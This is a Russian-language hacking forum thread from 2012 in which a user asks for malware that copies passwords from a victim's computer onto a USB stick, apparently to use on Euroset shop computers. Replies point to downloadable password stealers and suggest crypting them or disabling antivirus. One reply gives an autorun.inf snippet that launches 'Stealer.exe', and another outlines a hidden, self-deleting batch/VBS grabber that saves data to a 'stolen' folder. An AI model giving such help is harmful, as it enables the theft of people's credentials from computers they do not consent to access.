Посоветуйте вирь который крадет пароли с компа жертвы и записывает на флешку

Тема в разделе "Для новичков", создана пользователем delm1k, 15 июл 2012.

1. delm1k
    delm1k Новичок
    Симпатии:
    2
    Добрый вечер дорогие форумчане!!
    Посоветуйте вирь, который крадет пароли с компа жертвы и записывает на флешку. Заранее спасибо..

15 июл 2012
  2. bagernyi
    bagernyi Новичок
    Симпатии:
    1
    Любой стиллер скачай, но на флешку какую? Компа жертвы или свою? Если свою то на мыло придут пассы сохрани и сам скинь на флеху

16 июл 2012
  3. delm1k
    delm1k Новичок
    Симпатии:
    2
    Когда я втыкаю флешку надо чтоб автоматом все пассы копировались с компа на флешку .

16 июл 2012
  4. zapadlo_zapadlov
    zapadlo_zapadlov Продвинутый
    Симпатии:
    4
    Специально для тебя залил последнюю версию .
    Код:
    http://www.xaker.name/forvb/showthread.php?p=177264#post177264

16 июл 2012
  5. DARKLORD
    DARKLORD Продвинутый
    Симпатии:
    40
    та не..ему надо что то типа расворд рекавери.и авторан проги с флешки..хотя,неизвестно,сколько времени будет физический доступ к компу.можно на флеху кинуть батник с вбс файлом.если скопировать фотки,видео или еще что..то без проблем,через батник и вбс..а пароли..если и скопируешь,то потом надо расшифровывать.если есть время,то через rassword recovery.проще через троян.закинул,ушел домой,потом посмотрел.

Последнее редактирование: 16 июл 2012
    16 июл 2012
  6. digimon
    digimon Новичок
    Симпатии:
    6
    DARKLORD,
    я чет не врубаюсь...p.s создавал тему на подобие этой...сказали что не возможно реализацию автостила на флешку...т.к не известно под каким именно именем определится твоя флешка на компе у жертвы...

16 июл 2012
  7. delm1k
    delm1k Новичок
    Симпатии:
    2
    "Это все не то. Я видел на одном хак форуме есть специальный вирь для флешек.

16 июл 2012
  8. ToBapuw_XaKep
    ToBapuw_XaKep Новичок
    Симпатии:
    8
    валялся когда то у меня нужный стилер, но толку от него - 0. Восстанавливал пароли криво, в общем УГ.
    Есть множество вариантов, если есть фантазия. Не знаю, автор, как ты не додумался.
    Вариант раз: _ttp://forum.k0d.cc/showthread.php?t=13036, на форуме тоже есть. Беспалевность, можно хоть вместе с жертвой запускать. Функционал не известен
    Вариант двас: 4 пост сверху - идеальный вариант, нуждается во времени. Примерно секунд 15. П*издишь пароли, они сохраняются в папочку, ты их копируешь и переносишь во флешечку^^ Гениально, товарищи?
    Причем каждый из них придется криптовать, либо отключать антивирус, что еще + секунд 15. Так что задавай следующий вопрос сразу сюда ^^

16 июл 2012
  9. delm1k
    delm1k Новичок
    Симпатии:
    2
    Ни один из этих способов не подходит!

16 июл 2012
  10. ToBapuw_XaKep
    ToBapuw_XaKep Новичок
    Симпатии:
    8
    ну что тогда сказать - закрывай топик, бери учебники по программированию и сиди читай, может через года два напишешь что тебе так нужно. А так это идеальные варианты по тому запросу, который приведен в первом посту.
    На будущее: учитесь излагать свои мысли, читайте книги, а то никому здесь не понятны ваши предпочтения.

16 июл 2012
  11. DARKLORD
    DARKLORD Продвинутый
    Симпатии:
    40
    так если ты видел на том форуме,то почему не взял?

Добавлено через 7 минут
    чет я не понял...а причем тут под каким именем?если флешка вставлена,работу делает прога,вирь или стиллер,который установлен на флешку.и соответственно,потом копирует в папку на флешке,которая заранее для этого приготовлена.

Добавлено через 11 минут
    интересно,что не подходит?если у тебя есть физический доступ к компу.то тебе и карты в руки!делай что хочешь!тут людям надо удаленно получить доступ к компу и получается и пароли слямзить и все остальное,а ты сидишь и паришься!/facepalm

Последнее редактирование: 16 июл 2012
    16 июл 2012
  12. delm1k
    delm1k Новичок
    Симпатии:
    2
    Выше перечисленные способы нельзя применить в евросети для хищения пасов.

17 июл 2012
  13. zapadlo_zapadlov
    zapadlo_zapadlov Продвинутый
    Симпатии:
    4
    Я вот читаю и маленько не вкурю чего тебе вообще надо ?
    Как в сказке все рас и подорвались тебе на блюдце его пассы принесли или как ?

Создаёш на флэшке текстовый документ.

[autorun]
    ShellExeCute="Stealer.exe"

Сохраняем и переименовываем на autorun.inf.
    И что тебе ещё надо ?
    И таких вариантов может быть дохренище включи серое вещество в работу и у тебя всё получится.

17 июл 2012
  14. delm1k
    delm1k Новичок
    Симпатии:
    2
    Спасибо большое!!

17 июл 2012
  15. DARKLORD
    DARKLORD Продвинутый
    Симпатии:
    40
    я тоже не понимаю.твое сообщение подразумевает физический доступ к компу!что ты щас евро сеть приплел?почему выше изложенные способы не подходят?ты ясно выражай мысль!по обрывкам твоих фраз,трудно дать какой то совет!телепаты в отпуске.как сформулировал вопрос-такой и получил ответ.ты ж сам смотри,растянули тему на 15 постов и только потому,что ты ясно не выражаешься!то не подходит,это не подходит!а почему и в чем проблема,ты не пишешь!/facepalm

17 июл 2012
  16. ToBapuw_XaKep
    ToBapuw_XaKep Новичок
    Симпатии:
    8
    наконец-то все прояснилось.
    Окей, только евросети часто находятся под слежкой охраны/видеокамер/прочих видов защиты, и если ты попадешься - срок твой будет больше, чем ты будешь ддосить сайт правительства с одного бота, который будет являться твоим компом. Короче, ахтунг, друг мой

17 июл 2012
  17. digimon
    digimon Новичок
    Симпатии:
    6
    я понимаю что все делает прога...что напишешь авторан под свою крысу...
    но ...как ты намерен в своей проге путь прописать до твоей флешки ?....
    если не знаешь под каким виртуальным именем он встанет у твоей жертвы ))...

17 июл 2012
  18. DARKLORD
    DARKLORD Продвинутый
    Симпатии:
    40
    Hidden Content:
    **Hidden Content: To see this hidden content your post count must be 5 or greater.**
    ================================================
    это надо скомпилировать в ехе файл!!!!.граббер остается независимым от назначенной компом буквы для флэшки на которой он лежит.идея не моя,но это работает.у меня с этим заморочек нет.короткое описание:создается батник,который соберёт некоторую инфу о машине с именем collect_info.bat и "по-тихому" запускается скриптом collect_info.vbs, который так же создается сам. Оба этих файла создаются с атрибутом "скрытый" и впоследствии самоудаляются.все собирается в папке stolen-украденные,на флешке.

Последнее редактирование: 17 июл 2012
    17 июл 2012
Загрузка...